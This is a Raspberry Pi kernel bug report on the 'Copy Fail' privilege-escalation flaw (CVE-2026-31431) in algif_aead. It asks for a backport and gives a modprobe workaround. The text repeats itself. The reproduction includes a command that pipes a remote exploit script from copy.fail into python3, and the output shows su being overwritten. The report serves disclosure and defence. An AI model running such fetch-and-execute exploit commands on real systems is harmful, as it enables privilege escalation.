Describe the bug
Summary
The RPi 6.12.x kernel tree does not appear to have backported the fix for CVE-2026-31431 ("Copy Fail"), a local privilege escalation via a logic flaw in algif_aead + splice(). The mainline fix is commit a664bf3d603d.
Steps to reproduce the behaviour
Reproduction
Using the published PoC from https://copy.fail/:
pi@pibox:~ $ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 2456 0 --:--:-- --:--:-- --:--:-- 2486
sh: 1: su: Exec format error
-bash: /usr/bin/su: cannot execute binary file: Exec format error
The page-cache write primitive succeeds (confirmed by su being corrupted), but privilege escalation fails because the dropped payload is x86_64, not aarch64. An attacker with an ARM64-compiled payload would likely succeed.
After reboot, su is restored normally:
pi@pibox:~ $ su --version
su from util-linux 2.41
Kernel module state
algif_aead is present as a loadable module (not built-in):
pi@pibox:~ $ modinfo algif_aead
filename: /lib/modules/6.12.75+rpt-rpi-v8/kernel/crypto/algif_aead.ko.xz
description: AEAD kernel crypto API user space interface
author: Stephan Mueller <smueller@chronox.de>
license: GPL
srcversion: 1D887535877F443CB443712
depends: af_alg,crypto_null
intree: Y
name: algif_aead
vermagic: 6.12.75+rpt-rpi-v8 SMP preempt mod_unload modversions aarch64
Workaround
Blocking algif_aead via modprobe prevents the exploit from acquiring its write primitive:
echo "install algif_aead /bin/false" | sudo tee /etc/modprobe.d/disable-algif.conf
sudo rmmod algif_aead
sudo reboot
Post-mitigation, the exploit fails cleanly before touching su:
pi@pibox:~ $ curl https://copy.fail/exp | python3 && su
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 731 0 731 0 0 2385 0 --:--:-- --:--:-- --:--:-- 2381
Traceback (most recent call last):
File "<stdin>", line 9, in <module>
File "<stdin>", line 5, in c
FileNotFoundError: [Errno 2] No such file or directory
pi@pibox:~ $ su --version
su from util-linux 2.41
Request
Please backport mainline commit a664bf3d603d to the RPi 6.12.x kernel tree.
References:
Device (s)
Raspberry Pi 4 Mod. B
System
- Kernel:
6.12.75+rpt-rpi-v8
- OS:
Raspberry Pi reference 2025-12-04
- Firmware version:
version ce768004a1c9657e60b33b0cc413d8e07320cb0d (clean) (release) (start)
Logs
No response
Additional context
No response
Describe the bug
Summary
The RPi 6.12.x kernel tree does not appear to have backported the fix for CVE-2026-31431 ("Copy Fail"), a local privilege escalation via a logic flaw in
algif_aead+splice(). The mainline fix is commita664bf3d603d.Steps to reproduce the behaviour
Reproduction
Using the published PoC from https://copy.fail/:
The page-cache write primitive succeeds (confirmed by
subeing corrupted), but privilege escalation fails because the dropped payload is x86_64, not aarch64. An attacker with an ARM64-compiled payload would likely succeed.After reboot,
suis restored normally:Kernel module state
algif_aeadis present as a loadable module (not built-in):Workaround
Blocking
algif_aeadvia modprobe prevents the exploit from acquiring its write primitive:Post-mitigation, the exploit fails cleanly before touching
su:Request
Please backport mainline commit
a664bf3d603dto the RPi 6.12.x kernel tree.References:
Device (s)
Raspberry Pi 4 Mod. B
System
6.12.75+rpt-rpi-v8Raspberry Pi reference 2025-12-04version ce768004a1c9657e60b33b0cc413d8e07320cb0d (clean) (release) (start)Logs
No response
Additional context
No response